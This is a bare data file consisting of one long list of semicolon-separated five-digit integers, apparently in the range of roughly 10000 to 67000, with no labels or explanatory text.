17427;36157;59597;64023;17212;22890;31622;27327;52896;14765;23090;60432;43184;20958;19259;37466;36625;32266;33704;23193;60037;59837;24480;10274;45265;44407;33626;17811;49658;49257;42243;47283;29764;37584;42025;52294;58088;37505;36923;39533;11845;50197;52317;10905;26597;51236;56377;28441;65173;47594;31280;63949;16954;43049;30928;25280;22513;66795;50238;54568;43813;22572;53513;45790;51911;15447;56661;46936;61766;50987;31712;45068;26243;29501;58660;51888;26299;27531;19575;65679;33144;65166;53536;35040;55760;32752;47086;52170;66337;40303;43461;38718;24469;34529;58303;42389;48453;28231;11505;65027;41491;19803;23214;65735;23744;50489;20943;65798;31023;17214;51776;66425;45481;28747;63397;56511;27612;34550;62595;31477;21203;65130;13856;23740;62861;53037;20873;11760;30823;17485;17060;52652;10045;47312;19350;34527;50448;21276;55674;65229;62030;62667;63463;63779;40981;17215;59350;27771;21111;61265;40266;58403;61800;31674;43769;28416;28405;36640;62098;54969;37368;13073;46499;34422;13840;39157;36472;61942;56982;36887;18849;30180;29150;14348;14612;10298;64364;45880;17043;46520;45120;21833;52860;10967;32721;30376;47603;20596;12429;37827;28350;33763;34078;35868;44549;60566;38586;43453;47872;13151;13999;52429;34395;32011;62668;52847;24097;20131;52818;38460;45620;20214;32278;54322;26729;49864;38633;53736;37480;36530;18252;57332;19380;16162;61905;33046;59036;16760;28031;27105;23014;43756;25128;63947;62493;26344;11897;66353;32855;30088;59095;38684;54656;19792;39931;59642;30801;28141;44882;15450;39671;44322;51203;11069;10692;12507;53174;54141;26514;45425;28379;12934;58179;59285;64511;51914;40131;51832;52595;23119;24073;34144;43920;11498;53636;36685;41083;40169;32977;45225;37452;59167;40773;46838;47578;23017;66685;59628;63437;28064;30221;31271;24857;59087;38570;51125;27666;39760;65403;51591;56488;58224;34443;47189;52226;14722;63241;60940;11336;47261;32893;20366;59904;61120;15604;23863;29885;23653;46345;13361;54391;18668;59632;42471;29288;60617;25785;57667;33241;41175;51104;43349;39713;56328;49332;43890;49483;58032;37070;21190;28723;37854;52351;27861;30680;64629;54178;25733;21350;44756;64193;31113;37075;30097;14120;42000;33425;36843;31165;13275;29046;26026;27918;41877;57311;52866;55784;22343;18968;15252;52476;38907;61353;40698;39965;57414;45111;63795;51227;13996;39228;63936;26496;53171;17788;59627;34684;26749;47577;48471;27917;46268;36540;43856;14193;62229;66779;64221;57164;25812;50132;12786;47109;17259;35528;57648;63173;24240;63645;37868;11972;58307;50199;34093;30806;65621;38234;41756;58047;10517;37040;21132;47361;37225;12645;56087;62609;46694;15619;43175;21634;39930;25850;26363;30189;12957;34131;52121;61839;39198;35151;47878;50758;38265;58308;12846;27942;60261;21658;16065;19474;64061;23962;64552;18067;27435;16207;27971;34348;66263;65878;19224;18955;32573;58697;27520;26166;33083;48568;52584;29130;62370;23594;48567;11974;44047;41624;52007;18742;44888;13042;16316;37199;40275;35705;56393;27191;18757;40313;53265;26843;56637;13425;57576;34730;13924;29004;16683;50504;59117;47725;27639;47709;28019;28148;12634;45581;24478;37213;49393;19140;33974;64380;62028;27294;40694;42168;40318;42077;13916;24808;66219;23743;64441;42188;30868;56548;27985;13883;50126;26935;60053;52863;60789;56960;52470;60506;48586;32107;13514;61041;61132;54438;55426;24407;15278;22621;28886;43879;24764;26315;18285;47356;47104;43160;33158;41803;19117;13257;20604;54797;26978;10637;33393;16694;23500;26240;19435;18199;42881;34878;17011;23321;15032;16399;53403;37067;30135;21681;24564;54208;34433;52911;51412;15297;24745;23503;50773;10214;63123;16351;44723;27864;49744;59533;20721;46175;53728;20147;32875;23258;23002;11032;44263;51742;12702;47730;53595;40308;24141;53973;29952;16060;23682;14483;55072;11287;13009;46186;65117;55375;63685;10047;18113;28386;19353;18355;13255;55290;63637;14293;53070;59404;53345;45267;13571;55780;50364;41481;56716;44883;46981;11896;48408;21806;38029;49345;28972;10016;63494;17826;51905;18177;17308;10593;65705;32606;65490;34750;46764;49928;66872;24543;56367;56582;35365;39145;66238;10079;50334;43830;16520;55303;24505;43008;33585;64418;42182;62900;53160;24311;12834;16445;10436;24306;59395;39829;26661;37603;22008;53478;27950;46311;32748;55717;23599;62708;62720;54413;13779;54580;38328;12488;65188;24915;40987;30694;43074;21031;15580;19122;63632;25299;64904;20251;59553;52853;53804;19295;57807;52604;56618;58399;17180;53165;38721;57472;43928;39450;53419;44401;47115;47571;27872;64956;38516;61280;41578;49868;41538;29125;44764;66666;25892;36092;33992;31516;59265;22843;23418;57215;26110;54087;35680;62753;52937;41512;18974;31528;52532;32636;21085;20770;44486;47135;40824;46158;19206;18550;47643;53267;21921;54865;28011;61794;33854;52957;53898;45101;61727;49856;43889;32046;60969;52130;30191;10510;65034;65731;46525;26746;50933;21124;15802;34372;20535;60780;52031;23478;19864;53629;57976;58437;27735;59474;18933;19582;34565;51326;15588;10117;22109;63902;58894;41202;48511;59346;16376;18014;35433;29647;34804;27719;35584;19384;47721;52083;30794;37266;17780;57496;31900;45796;57851;49481;40669;39915;57542;40326;39284;54769;63810;21183;47504;22547;64443;63906;46297;32789;60328;19993;43257;20705;48563;38565;37735;45168;20007;14007;54127;43077;35499;60470;41004;58505;40654;30299;21180;31548;24532;34282;35322;29246;22918;11618;15275;54246;19808;53564;56905;61940;35698;36815;56107;29234;54392;49846;54511;64530;44942;52557;29214;38470;16112;42173;53415;15603;36905;52266;55436;35299;10440;58122;22433;28946;64619;12982;15130;66413;49364;47370;36038;57430;34485;56671;55793;46204;31651;58893;42269;62914;60738;66724;59667;32560;39746;56142;42902;11411;33186;30319;23335;53368;42693;18583;39258;60605;18349;53619;16994;26114;23671;22786;51564;62317;16286;56446;51804;44400;22589;55456;29677;58542;36060;66557;63990;37927;58988;28297;35111;18250;56468;52043;29544;38366;33354;44449;21991;16529;30341;65897;17254;44951;15035;55747;24502;61207;41907;21982;25525;11120;22875;23362;12324;45870;39845;62442;50736;61551;21414;55463;21546;56041;60498;43318;37051;60909;25814;33303;59450;51345;61726;32242;43488;11796;36502;47547;49271;58666;43467;46651;15759;66962;11165;17829;12653;14818;55708;31154;50104;25144;25490;34119;60676;25044;59961;60422;60480;49432;39922;55116;30413;15108;12516;58227;30046;47497;32800;25941;66215;17410;51940;19303;38221;44669;47619;26528;66210;39923;23535;24281;38015;42986;55604;41422;23684;20810;42189;16680;62129;19930;51928;66514;32638;33159;27226;48917;50349;43648;50445;59768;66967;49870;29386;25174;33777;22971;65986;16904;37380;32524;21968;50008;25950;65449;43854;39396;23907;58836;60990;64910;56280;27580;31510;24729;63589;26598;51290;59397;49360;20926;26625;41660;59538;62522;36203;64572;26696;12361;13539;28858;45698;62979;58754;18867;35248;57239;63181;25849;51166;61247;27830;17371;33701;31377;44559;12650;49633;16127;28938;50100;26167;58134;57376;41762;34447;52211;48454;22457;33466;15686;19645;45476;37414;43128;11722;59783;36227;54346;37201;60683;26596;52437;58612;24926;50219;10705;38441;21326;64404;25304;30625;28942;24180;44930;40660;19010;61694;66711;57159;47720;42595;29777;13921;50583;26462;64312;59542;27208;53754;46973;63592;27821;46021;32790;38410;22104;21432;26891;40365;46984;39094;10198;19907;60661;42879;50302;11928;30596;49474;26495;45422;29664;27238;26048;58372;44800;19162;46478;58113;19138;62155;29657;12672;32324;52654;23998;49913;48363;25163;51238;38181;57295;28283;11207;46115;57636;50670;32919;33472;50209;64105;58847;44881;33370;22841;41535;29161;32234;36661;44266;37310;25740;13219;41247;13496;41597;41035;25519;43559;14912;14469;39365;60007;26712;52000;19183;14709;39558;64868;12845;36836;66142;31410;14664;25711;51995;22787;46286;52950;44931;59352;11867;21975;39501;39418;55687;48298;56830;11203;13564;30028;66390;64839;44694;44200;65678;34100;30347;31532;54887;42256;33365;51017;26441;55718;36611;24064;28114;43430;56230;47410;20524;56540;35627;16788;62210;37117;32062;27486;57857;41327;39272;59659;34790;36156;26493;55766;13576;61428;52963;49556;55443;22090;59310;57056;61036;28010;39323;38031;60591;22524;45050;47827;21635;25404;26803;66467;20826;50698;61222;52334;42223;13349;59431;51276;63625;40334;35194;52465;31579;66723;36756;50249;35146;63603;16005;22416;61859;34801;25546;43876;37911;28209;34926;10484;55937;15106;33573;57354;52102;36210;41875;51418;16489;46252;47778;46383;16198;26467;44088;45054;22904;35298;36546;53957;46552;24364;29362;22016;29624;38036;30110;59064;61952;53033;36462;48848;14157;44333;46553;40281;40690;34366;48662;34910;54075;45016;27535;25386;54644;14756;32434;29339;54652;27116;13772;62757;27936;59522;60360;24072;35809;61736;35172;35032;53496;18669;66034;37917;37693;46692;55247;40319;59818;32380;22351;36795;44025;53466;55472;33177;15342;62513;42178;28665;57369;10245;21977;49576;41775;62144;42853;22632;21249;20363;23441;51185;16031;18003;33358;31077;63454;56407;41492;48603;54020;11627;12401;28051;50000;30296;53023;44276;11386;41427;35634;33942;44753;66755;26901;35814;27328;41142;11791;29916;13034;51881;50846;65641;13878;54054;11809;17049;23427;40112;37995;25189;61486;65950;37321;51970;28780;34853;13800;43103;50331;12699;25676;42829;33957;33263;28409;56016;23106;29419;65932;25058;59270;65640;50841;41320;29875;46456;15881;49303;64116;64819;13402;54255;15484;21588;51577;25149;51489;44746;36435;16882;21380;13867;58986;62467;55567;52179;40389;28443;11385;18762;65360;54425;37681;13499;10579;18749;61937;57470;27926;52523;41523;53709;26431;46599;66088;49988;18753;41776;40089;63418;26543;48559;54658;50900;33050;20583;43376;62880;51619;20779;14971;55289;30838;13220;64695;26179;41058;44498;26580;18414;32070;28560;28144;41375;19715;34680;36940;50213;48295;11513;31491;18311;33035;28407;19307;61779;63357;38691;13104;26897;14434;34811;43352;13437;61070;26294;47415;11394;59540;27512;66003;15480;64218;17414;52085;31293;19759;55947;39541;57835;35704;39107;26645;14016;51429;47766;18341;61600;56758;10456;27414;22372;39350;47512;66102;20555;41066;18446;39966;21697;64734;39316;60278;44983;50306;29478;25487;32699;30688;64725;37615;60093;50700;46511;58076;50024;51859;47016;21403;19633;36325;62545;21498;28679;61091;24795;23265;60265;51600;22811;35759;34795;15740;33175;51740;53871;14079;43896;57967;62287;49568;19652;15618;46827;60954;43294;50581;61500;58908;14882;66572;51683;64788;46319;49663;37586;32064;19100;45573;12364;65252;61182;38692;31719;31389;34202;34611;49379;63857;43892;52822;33889;31710;12534;31144;55234;50828;41222;32954;18528;31413;57607;19605;54286;60310;42397;42235;61595;13956;25775;45121;64176;55358;39402;41901;64525;33653;34296;36005;59791;45753;43869;64825;33529;50441;27635;14512;46036;28219;29998;66966;34114;29948;33410;55805;53764;50393;58530;41318;49874;13678;47816;39953;37981;43811;12723;30024;45398;65716;48373;34349;55787;21088;58358;39184;16467;58651;40633;58350;16558;11136;57779;10902;35127;22957;60113;56153;53537;19709;36266;55029;34941;33760;12031;60989;60757;24546;32314;20073;22960;64258;45183;10516;66553;40729;21475;29548;33989;10433;10293;20671;48359;25453;18903;42740;64119;58182;18159;34004;15628;42605;57259;52839;18945;52486;39209;54585;24918;40494;22504;12045;10766;45045;64033;31205;57201;64352;25581;28192;57751;40312;43023;58838;52278;59564;63907;14883;25698;62766;35824;35082;14843;41014;18302;23955;33567;39169;40177;26624;33225;21440;53215;34373;49198;19980;22162;27904;21231;26037;55173;61802;49107;18565;65076;48281;45632;10583;45332;20516;45816;43541;46307;49561;63003;31258;59113;20639;56170;43110;20231;12230;44832;38910;63694;22733;27576;62571;50652;22010;24752;48203;26034;35567;32086;38201;56769;31294;34604;49909;18622;51467;51232;29176;41164;44245;25215;63027;61210;46094;58683;35813;48805;52793;21396;65207;51481;43771;14319;43044;19902;54239;38581;57900;27237;30808;13463;47335;20700;50449;16580;42107;44727;33200;11919;40770;23067;10172;48169;40404;58528;18924;38577;54160;40120;45896;55434;14798;54306;14299;23241;53584;54223;63145;53363;31647;19998;41343;61366;65802;58294;45319;55896;32462;21950;64039;27286;38497;63997;36187;46537;26193;28695;24179;43451;56018;53307;19984;47724;49457;35501;29399;66709;18721;28708;62022;42684;28184;24193;65145;16632;19934;47223;34913;62034;53362;13746;18816;44090;20800;42844;57317;15528;63099;15404;35231;51341;48705;44836;42440;24690;33551;23698;25013;63620;32037;58713;43295;66955;46859;55596;54079;21524;57971;25688;32522;32538;22777;54833;40800;58154;38989;43355;38301;18921;46111;19573;29584;17175;39622;43298;24351;49264;31842;28832;28835;58092;23455;35863;13481;31650;50723;42890;42145;34848;13846;57033;59154;35743;15244;24403;42428;49613;20301;63383;27410;54876;23945;18767;41237;63549;16254;58583;62196;40627;27523;43934;52067;24821;63510;40382;63755;19089;57345;21369;33812;33417;21457;41055;17680;64225;49272;54227;24819;44353;18026;13563;62877;65191;44062;21422;31521;30402;32670;14997;27922;35335;56215;26187;63700;14372;25510;29850;27289;34959;62202;15458;58343;41280;61717;53777;60193;57325;62841;43068;29032;27218;60937;57168;54344;22881;36927;57437;61560;36184;44837;21237;65787;63309;17656;32030;30466;34830;48529;17814;50750;40621;18763;49254;50827;21792;40555;42847;20545;18832;22268;10052;35803;44818;19431;62270;52540;65803;43622;64357;14833;35470;51497;21568;26291;33209;65829;12659;62608;52786;14343;41381;14420;34837;11462;12297;41325;20087;66184;40011;47071;52125;52017;51435;66237;66418;50384;37949;21530;11329;37536;14395;52111;62381;62044;52674;16718;46729;11300;43422;26095;52153;62185;58070;57664;18746;20679;20519;33976;15750;56451;39959;12392;65305;28058;32078;19107;33449;31520;44650;66690;37605;55564;29923;37024;31612;25905;33848;33750;10982;41098;27540;44001;15139;46753;36884;39639;23736;61579;21766;39917;60973;52606;15180;40093;53756;44639;36859;47513;33143;23377;34610;43061;63966;42127;30298;18064;57716;38641;40202;42063;27491;45024;10690;11187;63785;22112;23128;41084;22477;20095;46240;18297;37279;44947;33420;44608;15031;45302;35369;29857;13850;34360;49417;54717;21715;61960;10983;42176;10405;54347;32115;16829;41081;63802;54126;51926;40034;37334;11601;17806;11045;59239;64833;22382;51960;46999;31662;43757;25321;42554;40918;56815;49861;24605;63009;47849;64958;36068;10321;44058;58507;14618;39623;32149;13605;27841;13611;13964;35188;60373;51430;25777;63529;62847;26925;36632;64040;10944;48786;49968;53935;46075;46167;63074;14623;38378;31631;25780;51718;66740;49686;28914;14858;24235;66037;13886;20324;34798;43156;38929;43303;50443;18995;46433;25646;38986;64810;25148;56073;38261;15961;41889;48306;57714;47701;22763;28756;34937;24897;24578;48680;26807;33677;53373;42671;10057;19779;40355;57696;20386;11592;63207;11444;54060;28947;18854;26562;23994;50130;57161;12754;47830;65650;34597;31191;30634;34328;40550;61948;20340;26727;52741;36935;16557;14611;39293;64917;48804;42148;15004;20610;17260;60643;13229;46370;56469;14565;63077;64391;29493;32905;21193;60493;65084;18540;38866;56536;36953;65399;23958;23862;55952;29576;40134;20866;39585;46084;14893;26557;30458;33021;16402;30431;66203;46351;63736;42805;10534;14265;38117;22058;51217;44761;66527;61019;51328;17555;36942;63224;21761;22345;35489;44541;45273;13412;36512;25584;56465;19352;24045;23742;16728;16064;47384;53035;57421;66248;62549;55852;66893;24626;45108;44133;28923;18381;51395;12604;56058;19008;11185;17296;16117;29983;53107;64930;58744;60828;28730;18344;50719;56449;41475;58974;58954;54922;43434;38294;30012;34509;63727;21764;45498;54423;13260;35965;47426;44421;31122;22529;56650;35359;13701;13356;17569;32100;20264;49461;43905;39699;24083;20162;27682;36558;20044;45408;62422;64127;35042;54269;13120;11193;45980;66207;43036;62476;10071;12756;31385;38863;28319;43178;18224;22223;52112;33607;20278;10564;60017;66949;61584;43104;56428;60576;56441;38461;25778;30278;30001;63925;10949;12461;43473;63639;60900;51848;44556;62254;19691;42501;48160;54894;30857;56608;36823;60247;17406;16896;56064;38815;65220;65436;21445;32379;16496;51572;23608;37538;31149;39800;19802;40456;40944;41195;42295;34945;13635;65311;56093;41419;60158;50874;42623;66132;28533;56120;59567;65580;51775;25458;66651;14726;29943;25779;30597;38417;40896;54549;62623;63847;14267;23352;52504;17535;12325;16511;51216;24451;65788;22011;46912;25869;61333;40338;25051;32338;54964;57640;27848;49851;36407;34190;31063;13480;49296;36155;20182;58689;26443;37453;29645;66927;23730;36654;25488;65760;21679;28161;27749;47231;56760;34462;17678;53472;48969;15793;19465;54771;42377;62596;27300;24773;11330;38061;66031;64735;13707;55069;48613;16085;62859;61912;16333;35162;58054;37777;18409;41338;19470;32786;28507;32813;11798;13132;19849;30756;30521;55799;11719;36913;55482;24899;59451;24674;29200;64286;66172;34821;23924;25916;14095;44623;47477;19541;16011;44831;22911;31724;46454;49700;48904;65318;59514;51042;58084;22100;47401;33190;16416;56136;32108;24317;26707;14419;64608;58184;23673;28897;43239;42129;52299;40344;61254;17228;31498;25081;34598;56951;28352;50733;63534;29470;19697;53226;43309;63071;22788;37501;25285;11770;17404;58360;31049;19537;59213;25416;49323;12781;51214;49290;16848;42264;40170;18912;53842;42327;46714;28333;19788;58387;48428;31571;35312;47083;56241;54430;45012;40552;19641;40610;64998;65669;35472;43012;44451;30566;33635;22916;51079;15230;14180;42874;34670;35628;65478;27185;18277;12687;56420;35601;51720;25030;39215;52972;51743;36597;45284;27350;25239;44601;48499;42912;39290;25471;25705;30748;60735;37807;46769;60553;34924;15925;64815;43310;10014;56750;56240;16593;22425;45015;53044;15216;24828;40176;61338;48465;40553;53288;14223;43441;12441;44915;55100;49889;13828;32622;22318;45627;54608;52311;45452;27676;50540;28894;11065;66839;63648;24273;15671;49680;40750;38621;36175;40544;58165;49169;23512;15293;55199;28515;54119;29697;32113;60421;65136;23481;30263;32170;11019;47417;45205;15201;42592;30019;37061;20650;58116;21865;28135;41831;28311;24533;23721;13769;40025;43553;43654;35401;64464;34601;12930;32027;11895;52781;32453;43415;66179;53114;53437;65846;30536;32021;11832;46458;36285;28811;58503;30428;63023;10126;56897;56300;58599;48574;13204;35395;36320;18139;61999;38225;65329;35799;22906;13502;21714;46096;20748;37853;56103;59336;11140;37690;33042;22521;58556;32523;38119;14676;22707;50474;32667;22052;33511;53956;12872;52585;40215;60225;48588;60058;19087;27466;65654;16470;48644;16890;48369;43560;36372;60793;66266;65294;63636;53476;42050;40205;27462;66706;26665;30887;12493;43862;57027;35496;47875;29061;57526;26861;39854;59287;51314;53577;13320;13051;16322;59179;66177;52223;14401;45647;15863;60258;45370;19677;14359;37263;41763;38429;23175;47811;24363;20079;31765;54882;10143;34783;16143;30290;56174;61475;18423;25053;46953;24668;28247;16122;12971;20035;53392;52725;35709;56569;31927;60272;54976;64345;22233;29932;24592;65374;49903;62198;31626;48181;19208;35636;66262;29640;35481;58319;48719;22050;35164;10562;45872;43088;60773;49622;54175;50429;50699;50925;57485;37858;48217;25879;57122;20677;23575;53829;23012;21017;22353;16454;64457;15379;11871;51963;55518;63098;42968;43282;34869;40724;32119;35385;29355;41579;22171;17377;20738;65042;55060;35802;51777;28035;52033;60008;51424;60840;36088;41713;57170;56472;38584;42778;15815;37463;14865;63942;34325;44654;61934;34098;16244;64026;43825;22373;17102;17457;13884;57416;34779;14200;62546;10196;63586;33692;26102;55907;42730;22281;52264;37685;29730;40885;63219;15036;47635;60914;28324;39363;18855;22277;65502;51463;55492;24270;26526;62204;30013;33111;20600;57089;48269;55160;62937;47418;20128;25689;45737;21750;53179;65239;64681;62259;59329;18147;26670;19967;45000;37018;32810;21702;45778;43901;27210;46545;45072;11086;54754;19787;47141;43786;17434;41469;41751;37434;30204;25939;63486;11694;26353;36459;32060;27804;56339;26211;46792;63546;41706;27091;20004;35081;42167;24720;61164;25835;25554;35521;40376;43259;34587;11064;14096;60753;54728;27819;14163;21739;32301;12256;20589;51980;57741;37719;19218;15280;15850;11542;13558;33166;65700;35202;48349;58021;65334;25611;25592;42884;37046;31636;26141;48442;18744;38881;60289;60746;23431;18148;49141;16430;30339;23667;61484;50955;50948;38176;48438;29543;23675;36970;20887;15402;25991;57154;13297;10176;37423;59996;23010;28421;44712;31775;40688;44583;60658;14464;49778;56289;20651;52241;54528;65845;44810;11500;55405;36231;62858;43226;41051;47435;29333;50671;57728;54538;37555;12738;33776;14784;26695;27993;38709;14706;54721;61825;40906;28970;13092;58470;66222;58680;12655;24261;31262;51700;24181;61002;55645;35165;23073;39867;38011;60235;23714;25207;55756;51579;42972;60489;20103;28364;48645;22850;30437;41989;47482;60134;18240;38247;26090;54258;42332;47172;62021;57469;48825;66532;61852;53270;49786;24911;53262;20620;12759;18653;50310;24620;11587;33780;65514;23396;16462;18353;12514;26032;57651;15680;17822;34787;23505;57980;52738;16173;62648;43217;36398;39237;23208;16669;49498;52645;38059;14283;64933;22064;18194;53130;32764;16975;45806;58365;43029;45779;17424;63063;59989;30284;29027;30875;16562;46236;44744;57611;23888;43149;22500;64476;38635;16813;56252;44822;16883;19109;61157;25225;47377;29138;50614;18553;30159;66061;15819;39138;47112;20461;51762;49113;12496;43715;31286;16465;57300;33441;14122;39573;17799;12744;51990;15731;50660;58603;60139;39446;43571;31234;30005;52225;55544;15967;59665;10722;36541;17754;26177;29219;45139;21804;44240;37230;21372;60503;57218;20229;18268;32208;31629;19704;12508;63171;58590;41351;65384;25103;23055;61716;21590;30070;42766;63849;30395;44673;18401;56408;34316;13675;64294;29967;34819;42298;26569;26635;26281;11199;11459;30209;46453;64688;26908;55582;53504;21325;26700;32089;11866;46431;39691;38489;30139;32409;10660;25859;47190;63705;13161;66607;18354;44515;58445;50129;10891;17024;60675;39196;55573;40778;26094;41374;61249;25438;57392;10743;51801;56494;39311;17295;27860;56316;32963;43996;28745;25538;18570;45486;58361;59618;57401;16471;12094;21895;18298;35957;40606;53527;30956;52027;14905;65632;54280;46709;39728;24331;66398;56877;41478;47515;49405;28264;37229;59177;52343;27203;62158;22300;13306;58761;37857;57880;16696;58567;56509;13256;27556;61593;35152;19464;39597;30235;63282;11175;17189;25954;51927;52316;28921;40145;24142;32365;36801;55090;33284;33041;23006;41366;42992;23260;19842;25481;29417;20618;57946;32026;14507;53069;12249;42199;29546;63820;55126;58859;19231;40745;44323;65340;48245;10827;22211;32499;36870;45649;39968;44887;58972;14526;15520;20167;62901;58201;44435;56065;31983;27951;12310;46485;61137;41700;57462;29172;36387;22354;50152;41539;11639;63939;21789;62312;40871;40127;40309;44693;14300;32323;28233;44561;15977;54114;53167;33527;16554;51446;63899;28124;23723;66754;48152;48311;33463;46352;45914;42185;21242;44167;58155;24208;10898;50207;35538;46949;17286;13503;16707;16845;20939;50229;18393;25972;34588;41257;23841;43509;58270;49741;35492;57737;31109;18473;17557;61433;25354;54093;50506;59082;53656;46274;58621;22744;21412;49312;14723;59580;19202;53950;15856;10693;56973;28388;23205;36765;39060;60684;59425;49685;38767;15096;39871;46670;10591;47803;21218;30745;22880;34711;30902;39106;24061;13101;37560;64136;14137;39136;39886;37633;54132;39014;47035;45719;61285;29180;10750;30099;23514;42015;44043;45674;23771;19446;57870;48425;14916;36176;44934;66199;28603;30027;30539;33423;49088;44488;47502;44574;43728;32424;18691;36109;20635;22747;55889;15974;11801;16203;20391;37364;64575;55406;34723;14921;13643;22901;49617;24928;48782;48824;59816;50668;20288;55379;27274;52074;41737;26758;35840;47331;59770;24471;64037;29895;43839;36544;49974;12434;53563;26133;14950;23874;60872;25612;30248;27789;66474;43494;43234;30830;12335;26965;29179;51287;15168;10996;57221;59420;44105;59704;64051;38865;40805;43410;51650;15518;39893;66495;46140;49831;49020;60095;62960;57713;31069;40230;12476;56100;59458;56413;16387;14210;40953;25095;30429;41118;37283;51093;13586;56544;54472;50571;54250;26788;66268;30173;25426;59992;48955;22161;51921;19966;43628;44224;63748;58928;37497;14710;22287;57312;27999;57294;61175;27624;46068;52410;57610;22592;30716;45675;33798;54405;11781;25152;46813;55522;46348;25975;45097;63326;46541;28883;32785;39828;65877;49737;31241;37278;63612;60530;33837;66220;27068;54547;52538;31923;62747;49881;47548;22655;56922;22055;58715;16263;52914;24096;58482;64229;50866;29955;41223;24534;50404;19612;25378;23661;19018;24428;34794;43775;55196;24161;39763;37235;23895;52569;56161;32558;54835;30472;26637;57145;57918;14918;32657;12539;51266;48327;31297;39698;64927;49398;10849;56040;32186;56123;56570;65317;52979;63571;22081;52684;33507;10973;46602;10166;42760;25902;46316;57074;22541;40545;34947;63500;49166;20125;47557;11707;31801;39417;61220;58203;65325;42337;49503;28177;49964;19479;54979;51876;57928;32495;53843;14624;61415;62255;66659;15382;55167;14717;27515;62197;58563;31357;52707;43865;30936;56482;58342;46210;27344;41071;63835;50595;45245;19985;28001;64130;37988;28836;46902;18335;41369;51137;35695;17358;24009;55324;28988;49308;58964;51092;40581;40335;19046;24418;60924;61031;60825;37926;17800;38329;21470;31143;16697;34351;21318;62784;31938;29331;30901;58591;57826;62069;40002;55676;12615;31375;60532;48381;53920;14312;52026;34962;30502;15852;28724;49311;66545;52801;52054;40284;18273;38331;47476;32180;19020;63332;53109;50338;30535;31609;33543;17298;40178;64521;24852;64246;28954;64990;31057;16380;27329;35598;29369;43610;38688;63234;55187;34138;60124;65156;18941;25219;60488;52029;60437;35619;63530;19924;40149;56491;42455;45594;59296;51887;23559;51168;65677;11786;22536;18462;44567;66515;25482;16222;13763;52461;28073;36360;13812;18025;66933;64118;14739;43271;52500;28726;46795;29123;53276;26164;32416;52757;32751;56892;29519;25042;39399;29449;23266;49668;53380;19447;13937;11130;17513;57775;54572;62389;65454;17563;64899;11410;24082;66834;25820;14462;30881;62151;15770;41311;32727;40488;55685;25628;25815;57862;39964;60151;28213;28792;48907;50745;55269;30641;24169;22172;57178;24034;30712;44634;19744;21850;45915;13096;65390;41554;52566;29901;13018;15883;13095;36403;45369;38915;38153;55911;10654;60719;51300;63804;62977;38155;58817;45667;15728;10907;28357;61331;61787;13813;60059;18251;19442;64687;57417;65908;42086;36865;61196;62621;44312;47461;49529;65626;20397;59436;10895;29992;33747;12933;19110;43758;63872;27766;23456;61206;46535;58889;26370;52921;39172;32820;24445;62240;37276;25818;36659;53176;18590;49165;28855;43891;10651;41471;64318;14123;11362;43100;18408;33726;33413;22864;28246;12610;15279;62296;54523;29476;37262;32817;19289;47301;30851;46790;27389;40753;25375;34115;35506;50774;37994;48702;11454;12652;49984;35797;54590;63093;15397;61882;38457;47526;54859;63602;24024;40448;37033;24174;15055;55101;10816;57858;15687;31544;32308;64510;63564;45380;46700;18304;43740;63060;49785;53945;39415;66018;36437;41479;13980;58730;40156;60244;29733;43211;63652;45909;52909;53295;38115;38980;32718;43994;58966;16277;21773;19613;54131;43114;40484;59344;40521;48830;66157;31055;23746;62769;46251;31306;31963;25677;41392;46489;56884;46628;31831;26777;21811;48784;44194;38245;50837;66174;42659;45673;52773;12737;46942;16012;12438;30552;63668;37825;59909;58898;45878;19751;56267;48291;16565;23158;28012;61456;38750;20354;66239;44309;26628;13513;37388;47090;30693;50738;45928;61563;54123;66564;45203;41221;22328;53705;13158;62625;52596;30651;59677;41486;18083;37121;46640;40035;62827;62941;27173;41279;34071;40658;52723;12241;12842;46309;26996;13022;13258;14203;24122;40540;32934;42878;13778;43069;33545;31432;17370;23880;64913;47704;20500;48197;66533;65036;27810;45506;27448;44715;22053;23493;42886;50965;63000;57731;39381;15331;21515;57018;35587;59465;37011;64611;51063;36489;47754;53007;17584;36653;39520;26276;66946;62363;11734;62774;39631;14705;66282;48507;30616;25340;48392;26194;44154;12011;59146;52546;36693;48803;40133;43600;48419;25169;12925;14152;43464;39668;20947;62602;50003;14258;38654;28157;60402;35059;65652;11174;53185;53701;57622;37998;15942;66384;10420;35446;45850;21898;38650;62339;30435;50022;52508;30076;12771;39555;52544;60889;21671;58196;28171;24688;22276;58942;43883;40813;15047;21716;10105;50325;37307;52381;34177;20835;12876;13475;18467;62629;27288;12309;27306;12124;24027;62172;33702;54170;32361;58260;13818;40656;34243;22083;36033;38931;50283;16908;10993;39283;64000;21169;35620;50436;65645;62731;49154;46728;37930;13045;51171;26652;62523;56332;55414;31824;17364;10762;66471;16897;65591;65881;32626;36260;57838;16053;26420;14269;52989;27341;33031;64371;65558;49030;44924;54009;65223;63799;17494;46752;40346;59631;27052;10250;37662;40114;53596;34580;27713;40757;29475;15733;46935;58299;56606;56530;24708;56803;63210;63321;63183;52845;27665;58533;60072;32400;53228;22273;17475;62362;38338;10754;42922;32203;17168;30865;42596;37045;38005;53809;11499;61513;39987;53310;56116;50128;42201;49036;43904;29256;13639;55260;44962;58593;66071;53148;25754;46062;66158;51688;19535;65615;23358;60711;47153;66753;11996;60911;38302;24202;60604;13630;56523;65114;21332;14845;29141;18564;25328;44545;31350;22227;53730;58466;58188;48161;27264;36604;48232;52053;43129;38400;37657;46402;20268;19422;45347;21632;62779;17164;54884;45986;63225;35079;62662;63844;42140;46242;65546;43686;37224;20891;52269;30825;20434;58529;54082;41466;56360;38165;14478;62978;60109;57921;28772;35583;50771;62276;54860;39554;47632;31588;43619;61947;25161;64048;60631;16450;58670;37268;27590;52609;43041;20649;39098;12583;49292;52129;42431;48748;16625;53570;51853;41746;35375;54487;26641;39166;12409;50079;44314;17297;30831;20156;41648;53658;40713;35028;37299;36639;17994;57352;40947;36304;59126;57402;57051;22040;37608;25722;43240;28393;50936;19585;24089;54853;56924;43990;38276;55681;61449;59151;43908;47452;62835;61713;27383;33801;51318;14314;35384;28830;52534;31206;49636;24155;58515;47680;13172;43777;53381;61335;26003;43952;56956;48234;43847;25073;50037;31899;33855;16619;25446;35136;23026;39043;48728;39053;12770;50215;46087;37789;50147;31668;15666;38272;23858;38797;35856;41711;15841;65039;20384;49919;61936;29522;17207;31857;22154;15988;61308;33004;66073;65556;26099;47486;32555;41391;25868;19038;40495;35585;32847;52705;26916;33669;33331;61046;29646;66284;49233;45700;56853;20171;26682;57271;62065;20716;64754;44187;44232;60540;52885;56845;40436;30117;10493;58640;59205;47562;42863;16323;63239;32313;30471;40527;42374;61867;14620;42502;47831;36638;48717;41079;15085;18426;23729;12899;13380;29173;14994;25102;